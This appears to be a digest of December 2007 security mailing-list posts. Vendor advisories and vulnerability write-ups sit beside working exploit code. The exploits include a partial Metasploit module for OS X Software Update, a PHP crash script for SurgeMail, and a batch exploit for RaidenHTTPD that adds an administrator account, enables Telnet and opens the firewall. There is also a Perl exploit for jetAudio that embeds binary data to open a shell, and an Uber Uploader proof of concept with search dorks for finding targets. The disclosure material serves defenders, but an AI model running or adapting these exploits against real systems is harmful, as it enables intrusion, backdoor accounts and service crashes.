rPSA-2007-0268-1 kdebase
rPath Security Advisory: 2007-0268-1 Published: 2007-12-17 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Local Deterministic Denial of Service Updated Versions: [EMAIL PROTECTED]:1/3.4.2-3.15-1 rPath Issue Tracking System: https://issues.rpath.com/browse/RPL-1992 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5963 Description: Previous versions of the kdebase package are vulnerable to Denials of Service in which a local user can render KDM unusable for logins by any user or cause KDM to exceed system resource limits. In its default configuration, rPath Linux 1 is not vulnerable to the Denial of Service against KDM logins. http://wiki.rpath.com/Advisories:rPSA-2007-0268 Copyright 2007 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html
Apple OS X Software Update Remote Command Execution
- Apple Mac OS X Software Update Remote Command Execution Vulnerability Copyright (c) 2007 Moritz Jodeit <[EMAIL PROTECTED]> (2007/12/17) - I. Vulnerability Description The OS X Software Update mechanism uses so called `distribution packages' [1], which basically consist of two parts. The XML `catalog file', which lists the available updates and the `distribution definition files' [1], which contain information encoded in XML and JavaScript, defining every aspect of the user experience, when installing an update. When OS X checks for new updates, it first contacts swscan.apple.com to receive the XML catalog file. This file references the distribution definition files, which can reside on another server. Software Update receives these files and calls some of the JavaScript functions to check, if the update is suited for the local machine. The catalog file and the distribution definition files are both received using HTTP whithout any authentication. By running a malicious update server, it is possible to provide distribution definition files, which execute arbitrary commands using JavaScript on the remote machine requesting the update. The System.run() method can be used for this, if the `allow-external-scripts' option was set in the distribution definition file, as documented in the "Installer JavaScript Reference" [2]. [1] http://developer.apple.com/documentation/DeveloperTools/Reference/DistributionDefinitionRef/ [2] http://developer.apple.com/documentation/DeveloperTools/Reference/InstallerJavaScriptRef/ II. Impact Combined with the ability to intercept requests to the official Apple update server by other means like ARP or DNS spoofing, it is possible to execute arbitrary commands on all clients requesting updates. OS X automatically checks for updates at regular intervals (default is weekly), which allows for exploitation, even without any user intervention. III. Solution This vulnerability was fixed with the latest Apple update APPLE-SA-2007-12-17. IV. Vendor Response 2007/12/06 Initial contact with <[EMAIL PROTECTED]> 2007/12/06 Acknowledgement of received report 2007/12/12 Agreement on public release date 2007/12/17 Coordinated release of updates and advisory V. Proof Of Concept ## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ ## require 'msf/core' module Msf class Exploits::Osx::Browser::Software_Update < Msf::Exploit::Remote include Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Apple OS X Software Update Command Execution', 'Description'=> %q{ This module exploits a feature in the Distribution Packages, which are used in the Apple Software Update mechanism. This feature allows for arbitrary command execution through JavaScript. This exploit provides the malicious update server. Requests must be redirected to this server by other means for this exploit to work. }, 'Author' => [ 'Moritz Jodeit <[EMAIL PROTECTED]>' ], 'License'=> MSF_LICENSE, 'Version'=> '$Revision$', 'References' => [ ['CVE', '2007-5863'], ], 'Payload'=> { 'BadChars' => "\x00", 'DisableNops' => true, }, 'Platform' => 'osx', 'Targets' => [ [ 'Automatic', { 'Platform' => [ 'unix' ], 'Arch' => ARCH_CMD, }, ], ], 'DisclosureDate' => 'Dec 17 2007', 'DefaultTarget' => 0)) register_options( [ OptPort.new('SRVPORT', [ true, "The local port to listen on.", 80 ]),
Uber Uploader <= 5.3.6 Remote File Upload Vulnerability
# Uber Uploader <= 5.3.6 Remote File Upload Vulnerability # Download: # http://sourceforge.net/projects/uber-uploader # Bug found by JosS / Jose Luis Góngora Fernández # Contact: sys-project[at]hotmail.com # Spanish Hackers Team # www.spanish-hackers.com # /server irc.freenode.net /join #fullsecure .vuln/ There isn't any kind of file extentions check in: "uu_file_upload.js" and "uber_uploader_file.js". .extentions/ you can submit files with extensions like: .html, .txt, .asp, etc... you can upload all extensions, except: sh, php, php3,php4, php5, py, shtml, phtml, cgi, pl, plx, htaccess, htpasswd. .PoC/ http://www.localhost/uu_file_upload.php http://www.localhost/uber_uploader_file.php .deface/ Once the file is uploaded you can see it in /uploads/ http://www.localhost/uploads/[YourFile] .fixed/ To fix it, you have to modify "Check for illegal file extentions" and "Check for legal file extentions" in the file "uu_file_upload.js" or "uber_uploader_file.js". It doesn't go on if its diferent to the allowed extensions. [code] // Check for illegal file extentions function checkAllowFileExtensions(){ if(!check_allow_extensions){ return true; } else{ alert('Sorry, uploading a file with the extension "' + file_extension + '" is not allowed.'); return true; } } // Check for legal file extentions function checkAllowFileExtensions(){ if(!check_allow_extensions){ return false; } else{ alert('Sorry, uploading a file with the extension "' + file_extension + '" is not allowed.'); return true; } } [/code] .dork/ "Powered By Uber Uploader" allinurl: uu_file_upload.php allinurl: uber_uploader_file.php //---\\ Greetz To: All Hackers JosS! / Jose Luis Góngora Fernández
[SECURITY] [DSA 1432-1] New link-grammar packages fix execution of code
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1432-1 [EMAIL PROTECTED] http://www.debian.org/security/ Steve Kemp December 16, 2007 http://www.debian.org/security/faq - Package: link-grammar Vulnerability : buffer overflow Problem type : local Debian-specific: no CVE Id(s) : CVE-2007-5395 Debian Bug : 450695 Alin Rad Pop discovered that link-grammar, Carnegie Mellon University's link grammar parser for English, performed insufficient validation within its tokenizer, which could allow a malicious input file to execute arbitrary code. For the stable distribution (etch), this problem has been fixed in version 4.2.2-4etch1. For the old stable distribution (sarge), this package was not present. For the unstable distribution (sid), this problem was fixed in version 4.2.5-1. We recommend that you upgrade your link-grammar package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Source archives: http://security.debian.org/pool/updates/main/l/link-grammar/link-grammar_4.2.2.orig.tar.gz Size/MD5 checksum: 742163 798c165b7d7f26e60925c30515c45782 http://security.debian.org/pool/updates/main/l/link-grammar/link-grammar_4.2.2-4etch1.dsc Size/MD5 checksum: 669 535a962c3aefbf92b3d09bd9355d3b57 http://security.debian.org/pool/updates/main/l/link-grammar/link-grammar_4.2.2-4etch1.diff.gz Size/MD5 checksum: 8231 fa03dfbb7a2e0a47130c9f1385eb48d3 Architecture independent packages: http://security.debian.org/pool/updates/main/l/link-grammar/link-grammar-dictionaries-en_4.2.2-4etch1_all.deb Size/MD5 checksum: 267530 52ef5d6278b5f8a5a0c0894b3d99235e alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/l/link-grammar/liblink-grammar4-dev_4.2.2-4etch1_alpha.deb Size/MD5 checksum: 169386 f866bf37b179cf8f1c31f13b0ab9100a http://security.debian.org/pool/updates/main/l/link-grammar/link-grammar_4.2.2-4etch1_alpha.deb Size/MD5 checksum:1 14b288d946738d5eefed5dc50e84040f http://security.debian.org/pool/updates/main/l/link-grammar/liblink-grammar4_4.2.2-4etch1_alpha.deb Size/MD5 checksum: 108456 826d5896c36850255bedfcc3b70a8ea1 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/l/link-grammar/link-grammar_4.2.2-4etch1_amd64.deb Size/MD5 checksum:16038 ea80489f9db4f247d5009bf435f40707 http://security.debian.org/pool/updates/main/l/link-grammar/liblink-grammar4_4.2.2-4etch1_amd64.deb Size/MD5 checksum:95996 0851ea02bd3b4b600d68df09016915cf http://security.debian.org/pool/updates/main/l/link-grammar/liblink-grammar4-dev_4.2.2-4etch1_amd64.deb Size/MD5 checksum: 127934 a43908000f552820cdcd2c1a7819f62f arm architecture (ARM) http://security.debian.org/pool/updates/main/l/link-grammar/link-grammar_4.2.2-4etch1_arm.deb Size/MD5 checksum:15074 5a881ae17e13efc9ae731b9f86d7a0ff http://security.debian.org/pool/updates/main/l/link-grammar/liblink-grammar4-dev_4.2.2-4etch1_arm.deb Size/MD5 checksum: 110896 54d4534ce7a06ed675d9c4d2c957e519 http://security.debian.org/pool/updates/main/l/link-grammar/liblink-grammar4_4.2.2-4etch1_arm.deb Size/MD5 checksum:87732 5dfce7e3245ab16bbab0f2325d462192 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/l/link-grammar/link-grammar_4.2.2-4etch1_hppa.deb Size/MD5 checksum:16202 3f8cbe2ab057f5d3b387c1e52e4e9e51 http://security.debian.org/pool/updates/main/l/link-grammar/liblink-grammar4-dev_4.2.2-4etch1_hppa.deb Size/MD5 checksum: 139488 2411aae738f8467e4180debc87b265ee http://security.debian.org/pool/updates/main/l/link-grammar/liblink-grammar4_4.2.2-4etch1_hppa.deb Size/MD5 checksum: 104292 105899d1fa1a37a2690a6d3372572912 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/l/link-grammar/link-grammar_4.2.2-4etch1_i386.deb Size/MD5 checksum:15458 9b43845e6fdb26319c4dd3d88afe5fb4 http://security.debian.org/pool/updates/main/l/link-grammar/liblink-grammar4_4.2.2-4etch1_i386.deb Size/MD5 checksum:89456 ffa178b41a336d1a9e11bca02a3d2232 http://security.debian.org/pool/updates/main/l/link-grammar/liblink-grammar4-dev_4.2.2-4etch1_i386.deb Size/MD5 checksum: 111356 50b911abcf
SurgeMail v.38k4 webmail Host header crash
http://192.168.0.1";; $puf=str_repeat(0xff,0xfff); $header ="POST / HTTP/1.0\r\n"; $header.="Host: $puf\r\n"; $header.="Connection: Close\r\n\r\n"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 0); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $header); $data = curl_exec($ch); if (curl_errno($ch)) { print curl_error($ch)."\n"; } else { curl_close($ch); } ?> original url: http://retrogod.altervista.org/rgod_surgemail_crash.html
RaidenHTTPD 2.0.19 ulang cmd exec poc exploit
rem raidenhttpdudo.cmd @echo off color 0a rem RaidenHTTPD 2.0.19 ulang cmd exec poc exploit rem WebAdmin one - not enabled by default anymore rem however works regardless of php.ini, because rem "ulang" comes from $_GET[] and some magic_quo rem tes_gpc disable code,lame divertissement one rem to demonstrate an unauthenticated directory rem traversal ... rem rgod --http://violentcop.splinder.com if {%1}=={} goto kill echo HEAD /?^ HTTP/1.1>in echo Host: %1>>in & echo Connection: Close>>in & echo.>>in nc %1 80 -v -w1< in > nul echo ..\..\..\logs\access_%date:~6,4%-%date:~3,2%-%date:~0,2%.log%%00> puf & set /p exploit=< puf echo GET /raidenhttpd-admin/workspace.php?CMD=cmd.exe+%%2Fc+net+user+sun+tzu+%%2Fadd+%%26+net+localgroup+Administrators+sun+%%2Fadd+%%26+sc+config+NtLmSsp+start%%3D+auto+%%26+sc+config+RpcSs+start%%3D+auto+%%26+net+start+RpcSs+%%26+net+start+NtLmSsp+%%26+sc+config+TlntSvr+start%%3D+auto+%%26+net+start+TlntSvr+%%26+netsh+firewall+add+portopening+tcp+23+sh+%%26+echo+REGEDIT4+%%3E+sh.reg+%%26+echo+%%5BHKEY_LOCAL_MACHINE%%5CSYSTEM%%5CCurrentControlSet%%5CControl%%5CLsa%%5D+%%3E%%3E+sh.reg+%%26+echo+%%22forceguest%%22%%3Ddword%%3A+%%3E%%3E+sh.reg+%%26+regedit+%%2FS+sh.reg^&ulang=%exploit% HTTP/1.1> in echo Host: %1>>in & echo Connection: Close>>in & echo.>>in echo please wait ... nc %1 80 -v -w1< in > nul ping localhost -n 15>nul & rem delaying ... del puf del in telnet %1 23 goto nowhere :kill echo %0 [target-host] :nowhere original url: http://retrogod.altervista.org/rgod_raidenhttpdudo.html
rPSA-2007-0266-1 tetex tetex-afm tetex-dvips tetex-fonts tetex-latex tetex-xdvi
rPath Security Advisory: 2007-0266-1 Published: 2007-12-17 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Indirect User Deterministic Unauthorized Access Updated Versions: [EMAIL PROTECTED]:1/2.0.2-28.9-1 [EMAIL PROTECTED]:1/2.0.2-28.9-1 [EMAIL PROTECTED]:1/2.0.2-28.9-1 [EMAIL PROTECTED]:1/2.0.2-28.9-1 [EMAIL PROTECTED]:1/2.0.2-28.9-1 [EMAIL PROTECTED]:1/2.0.2-28.9-1 rPath Issue Tracking System: https://issues.rpath.com/browse/RPL-1928 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5935 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5936 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5937 Description: Previous versions of the tetex package are vulnerable to multiple attacks, the most serious of which allow user-assisted attackers to execute arbitrary code when dvips or dviljk are run on maliciously crafted DVI files. http://wiki.rpath.com/Advisories:rPSA-2007-0266 Copyright 2007 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html
Heap overflow in PeerCast 0.1217
### Luigi Auriemma Application: PeerCast http://www.peercast.org Versions: <= 0.1217 and SVN <= 344 Platforms:Windows, plugin for Winamp, Linux and Mac Bug: heap overflow Exploitation: remote Date: 17 Dec 2007 Author: Luigi Auriemma e-mail: [EMAIL PROTECTED] web:aluigi.org ### 1) Introduction 2) Bug 3) The Code 4) Fix ### === 1) Introduction === PeerCast is a multi platform open source software for peer2peer radio streaming. The broadcasters are visible at http://yp.peercast.org ### == 2) Bug == The handshakeHTTP function which handles all the requests received by the other clients is vulnerable to a heap overflow which allows an attacker to fill the loginPassword and loginMount buffers located in the Servent class with how much data he wants. >From servhs.cpp: void Servent::handshakeHTTP(HTTP &http, bool isHTTP) { char *in = http.cmdLine; ... }else if (http.isRequest("SOURCE")) { if (!isAllowed(ALLOW_BROADCAST)) ... mount = in+strlen(in); while (*--mount) if (*mount == '/') { mount[-1] = 0; // password preceeds break; } strcpy(loginPassword,in+7); .. if (mount) strcpy(loginMount,mount); ... ALLOW_BROADCAST ("allowBroadcast" in peercast.ini) is enabled by default. ### === 3) The Code === http://aluigi.org/poc/peercasthof.zip ### == 4) Fix == Version 0.1218 or SVN 347 ### --- Luigi Auriemma http://aluigi.org
Re: Wordpress - Broken Access Control
The is_admin() function is not supposed to tell whether a user is an administrator or not, it tells whether the user is looking at one of the administration pages. As such, this function does exactly what it is supposed to do. As for the rest, there is no flaw. To view a draft, the user must authenticate and have the correct capability set. There is no way to view drafts without being logged in and having that capability set on the user's role level. This "vulnerability" is non-existent.
release uhooker v1.3
What's uhooker?: A tool to intercept and manipulate execution of programs. It enables the user to insert hooks in function calls and arbitrary addresses within the executable file in memory. The hooks handlers are written in Python and can be changed at runtime without the need to restart the inspected process. Download: http://oss.coresecurity.com/uhooker/release/1.3/uhooker_v1.3.tgz http://oss.coresecurity.com/uhooker/release/1.3/uhooker_v1.3.zip more info: http://oss.coresecurity.com/projects/uhooker.htm http://oss.coresecurity.com/uhooker/doc/index.html Some Videos: http://oss.coresecurity.com/uhooker/doc/uhooker_changeconnect.wmv http://oss.coresecurity.com/uhooker/doc/uhooker_sendhex.wmv What's new in uhooker v1.3? === -Several bug fixes, everything should work better than before :) -Fixed bug with readunicode() API where reading empty multibyte strings, resulted in the plugin freezing for ever. -Now you can load multiple .CFG files (load one, then load another to hook something else, etc). Previously, you were only allowed to load one .CFG file with breakpoints/handlers definitions. Now you can load as many as you like whenever you want. -If a .CFG file overlaps previously set hooks, you have the chance to redefine them (for example, you can dinamically change the file/function handling the breakpoint. This adds to the feature present since the first version of uhooker that allows runtime rewriting of the handler's code). -Errors in the code of the handlers (written in python) are now correctly handled. -Previously, if you had an error in the code you wrote to handle certain breakpoint, this caused the 'uhooker's python server' to 'crash', and you needed to restart your debugging session all over again. This scenario was very common, particuarly if you were developing your own handler/script for the first time, or if you were modifying at runtime the code of a handler/script. Well, no more! :), Now if you have an error (syntax error, identation error, general programming error,etc), the error that your handler has will be displayed on the uhooker's console, and you'll be able to recover from that error. This improvement means: 1-If an error occurs on the code, you don't need to restart the debugger's session (and lose the state of the program, etc.). 2-If you are changing in runtime the code of the handler, and you makee a mistake, you'll see what caused the error, and you can fix the script/handler and move on!. -and there are probably more things but I didn't write them down and now I dont't remember :).
[SECURITY] [DSA 1434-1] New mydns packages fix denial of service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1434-1 [EMAIL PROTECTED] http://www.debian.org/security/ Thijs Kinkhorst December 16, 2007 http://www.debian.org/security/faq - Package: mydns Vulnerability : buffer overflow Problem type : remote Debian-specific: no CVE ID : CVE-2007-2362 It was discovered that in MyDNS, a domain name server with database backend, the daemon could be crashed through malicious remote update requests, which may lead to denial of service. For the stable distribution (etch), this problem has been fixed in version 1:1.1.0-7etch1. The old stable distribution (sarge) is not affected. For the unstable distribution (sid), this problem has been fixed in version 1.1.0-8. We recommend that you upgrade your mydns packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian 4.0 (stable) - --- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/m/mydns/mydns_1.1.0-7etch1.dsc Size/MD5 checksum: 1016 6d0a22d23d6a218b2f6c36a0973fec29 http://security.debian.org/pool/updates/main/m/mydns/mydns_1.1.0-7etch1.diff.gz Size/MD5 checksum:23201 68288d6559240f652b363175077ee372 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_alpha.deb Size/MD5 checksum: 283646 605abae7c94de5d29b3c0b2e627ba3de http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_alpha.deb Size/MD5 checksum: 276524 2ba115052634baec10286c91a5cc6ce6 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_amd64.deb Size/MD5 checksum: 261562 fb735c256a150474a83b162823817666 http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_amd64.deb Size/MD5 checksum: 254146 57ff5991069034d7c97be430b8149aaa arm architecture (ARM) http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_arm.deb Size/MD5 checksum: 244500 8361e2dfe50de8abb41d97c0bde6c8fa http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_arm.deb Size/MD5 checksum: 233926 3410cf9b02fea32800f7273b0db312c3 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_hppa.deb Size/MD5 checksum: 259956 dd54add61133e98ca326ffbba9d45491 http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_hppa.deb Size/MD5 checksum: 267084 d457000b6afc8dcf160e06f91e5449d8 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_i386.deb Size/MD5 checksum: 249396 a0d5f307f3eedfc6c85a587cc5572463 http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_i386.deb Size/MD5 checksum: 241112 a2ef881adaf58f206315b6843f6e0f0f ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_ia64.deb Size/MD5 checksum: 336738 80c0da6e223de21d5d13ee34667c17ec http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_ia64.deb Size/MD5 checksum: 342716 4f95f73ebe81ae596edeae7145a55be9 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_mips.deb Size/MD5 checksum: 257376 e607aff2b4d31066337d10a6168831a8 http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_mips.deb Size/MD5 checksum: 264792 c1f711aa974118740dd077078004a0bc mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_mipsel.deb Size/MD5 checksum: 257854 10b2f0d2ad613f24d9a1a316fd5c3699 http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_mipsel.deb Size/MD5 checksum: 265208 ec23fa6fb9fcd9c2422ff61838b65a04 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_powerpc.deb Size/MD5 checksum: 257796 7e94fa5255766b49edf123c1e1546aa0 http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_powerpc.deb Si
[SECURITY] [DSA 1433-1] New centericq packages fix execution of code
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1433-1 [EMAIL PROTECTED] http://www.debian.org/security/ Steve Kemp December 16, 2007 http://www.debian.org/security/faq - Package: centericq Vulnerability : buffer overflow Problem type : remote Debian-specific: no CVE Id(s) : CVE-2007-3713 Several remote vulnerabilities have been discovered in centericq, a text-mode multi-protocol instant messenger client, which could allow remote attackers to execute arbitary code due to insufficient bounds-testing. For the stable distribution (etch), this problem has been fixed in version 4.21.0-18etch1. For the old stable distribution (sarge), this problem has been fixed in version 4.20.0-1sarge5. We recommend that you upgrade your centericq package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge5.dsc Size/MD5 checksum: 875 0e3de98bb55d5af241acbb7c42c47cd0 http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge5.diff.gz Size/MD5 checksum: 117817 a0d486891cbf0dbafd36acda7d329e7a http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0.orig.tar.gz Size/MD5 checksum: 1796894 874165f4fbd40e3be677bdd1696cee9d alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge5_alpha.deb Size/MD5 checksum: 1651664 69022dfe5342b1056abca9c9b433532d http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge5_alpha.deb Size/MD5 checksum: 337338 b408f37c75ebff4cca8e0fd9bae2a2e2 http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge5_alpha.deb Size/MD5 checksum: 1652642 b1e027154c70c15250c131bcd1584c30 http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge5_alpha.deb Size/MD5 checksum: 1651712 1fc9e5fbf1d193d8d6ec6c2fa9cf28bf amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge5_amd64.deb Size/MD5 checksum: 335496 e89f821a32c11d314b397ee454da5094 http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge5_amd64.deb Size/MD5 checksum: 1355704 f3371f5f48e1057f1fb80714c0ea98bc http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge5_amd64.deb Size/MD5 checksum: 1355942 dbaa8f53bcddceb3828e3b8b857bf833 http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge5_amd64.deb Size/MD5 checksum: 1355764 2752c6ff95628f99693521617bc32d73 arm architecture (ARM) http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge5_arm.deb Size/MD5 checksum: 2184304 34cd68e7c3f0374c40e545a61446f48c http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge5_arm.deb Size/MD5 checksum: 2185094 7cbfa8db84b905a267ddf518415a7553 http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge5_arm.deb Size/MD5 checksum: 336124 19e8fc68148e1ebc8dc6a51c2c488689 http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge5_arm.deb Size/MD5 checksum: 2184366 b5ac5dffa73e7273a3e03b91e4413be0 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge5_hppa.deb Size/MD5 checksum: 1812692 c21a00400546a5fbf571cf517bd34657 http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge5_hppa.deb Size/MD5 checksum: 1813624 f48400ea56e3027d2e828b3353442131 http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge5_hppa.deb Size/MD5 checksum: 336228 035a6af70173afb011a9a77631bdab3b http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge5_hppa.deb Size/MD5 checksum: 1812750 10f3220cf0a0334113b4eb6b03e7f63c i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge5_i386.deb Size/MD5 checksum: 1350010 fbf767b42da3ffc738073577afea697a http://securi
jetAudio 7.0.5 COWON Media Center MP4 Stack Overflow
another vulnerable application. #!/bin/perl # # jetAudio 7.0.5 COWON Media Center MP4 Stack Overflow # # 0-day discovered and exploited by SYS 49152 # # Tested on win XP SP2 ENG # Shell on port 49152 # # usage: # - download the latest 3ivx codec from here: # hxxp://www.3ivx.com/codec/3ivx_MPEG-4_501_trial_win.exe # # - play the AVI file with COWON Media Center # # Maybe I will add more vulnerable apps if I have time. # SYS 49152 # # gforce(put the @ here)operamail(put the . here)com use Archive::Zip qw( :ERROR_CODES :CONSTANTS ); # begin binary data: $bin_data = # 3289 "\x50\x4B\x03\x04\x14\x00\x00\x00\x08\x00\xDA\x6C\x91\x37\x9C". "\x4D\x90\x80\x69\x0C\x00\x00\x5C\xC2\x01\x00\x07\x00\x00\x00". "\x6A\x65\x74\x2E\x61\x76\x69\xED\xD7\x7B\x58\xD4\x55\x1A\x07". "\xF0\x77\x06\xF0\x82\x97\x47\x4D\xC1\xAC\xA5\x31\xB4\x2C\x03". "\x61\x00\x05\xB3\x44\x64\xC0\x4C\xC4\x2B\x78\x41\x6C\x60\x46". "\x19\x61\xB8\xCC\x0C\x20\xA6\x84\x62\x5E\xC9\xAD\xD0\xD2\x92". "\x15\x4D\x4B\xCB\xA7\x52\x2B\xCD\xB6\xD4\xA7\xCC\x28\xA3\xEC". "\xAA\x95\xB6\xD9\x45\x58\xDA\x52\x22\xCD\x5B\xED\xFB\xCE\x39". "\x23\xB8\x3D\x7B\x79\x9E\xDD\x67\xFF\xFA\x7E\xEA\xF5\x9C\xF9". "\xCD\xEF\x77\x2E\xEF\x39\xBF\x33\x4A\x44\xA6\x59\x9E\xB2\xC2". "\x94\xE8\x11\x26\x62\x52\x3A\x0B\xA3\xCD\x0E\x77\x81\x53\x3E". "\x93\xA1\x2E\xD8\x59\x50\x50\xC2\xB5\x3C\x67\x49\x8E\x4D\x2E". "\xED\x4B\xFB\xC3\xF9\x03\x39\xD3\xBE\x23\x32\x4E\x21\xBA\x79". "\x11\x19\x48\xFE\x6F\x75\xD5\x87\xDF\x7F\x8E\xA7\x7F\xC9\x48". "\xD4\xA5\xD6\xE3\xB2\xE6\x72\x3D\xC3\x93\xEB\xED\xB3\xBD\xF4". "\xB9\x2F\x2D\x44\x5A\xD2\xAD\x71\xBF\x6D\x18\xAE\xFC\xF1\x8F". "\x17\x5B\xC5\x5F\xF5\xA9\xCB\x30\xA7\xCD\x61\xE5\x8A\xC9\x69". "\x6B\x9D\x97\xEA\x63\x7B\x22\x75\x9A\x42\x93\xDF\xF0\xDE\xD8". "\x37\xC7\x96\xE7\xF2\x3D\xE5\x2E\x28\xCE\xA7\xAB\x75\xFE\xC9". "\xE9\xC8\x9F\xC5\x95\x6E\x6E\xA7\x6A\x48\xEB\x67\x53\xD7\xAF". "\xB7\xB9\xEC\xB3\xF4\x35\x19\x52\xE7\x62\x57\x9E\x49\xD5\x3B". "\xEF\x76\x7B\xB2\xF2\xB8\x3E\xDB\xED\x71\xFB\x9E\x95\x7B\xD2". "\x79\x11\xAC\x6D\x3E\x2B\x46\xEA\x26\x05\x0F\x4F\x44\xD9\xDD". "\x36\xB7\x54\xFC\x2A\x2A\x2A\x6E\xE4\xD2\x9F\xCB\x9E\xF1\xBD". "\xC8\x18\x44\xC6\x61\x5B\xC9\xD0\xFC\x4E\x00\x5F\x31\xF6\xE8". "\xD6\x8E\x0B\x03\xE7\x95\x7A\xBB\x3D\x1E\x77\x6B\xB3\xC6\x4F". "\xF8\x21\xA9\x0F\xE0\xEE\xB3\xAF\x74\xA2\xBA\xEC\xA5\xCB\x50". "\x8E\xCE\xAA\xDE\x29\x8F\xEF\x9B\x47\x57\xC8\xF3\xD4\xFE\xFF". "\x14\xEF\xF2\x10\x2E\x71\xFC\xC4\x21\xF5\x5D\x1C\x1F\x71\x6C". "\xE7\xA8\xE0\xE0\x35\x32\x2C\xD1\xDF\x6D\xE6\x78\x8A\x63\x07". "\xC7\xE3\xFA\xDE\xB5\x1C\xBC\x67\x0D\x3C\x7E\xC3\x06\x8E\x2A". "\x8E\xA7\x39\x38\xCD\x86\xF9\x1C\xEF\xE9\xCF\x7F\xE4\x58\xAF". "\xE3\x63\x8E\x2F\x39\x16\x70\xBC\xCA\x91\xC1\x91\xC5\xB1\x5B". "\xF7\xC9\xCB\x6A\x48\xE1\x78\x94\x83\xDF\x11\xC3\x21\x5D\x5F". 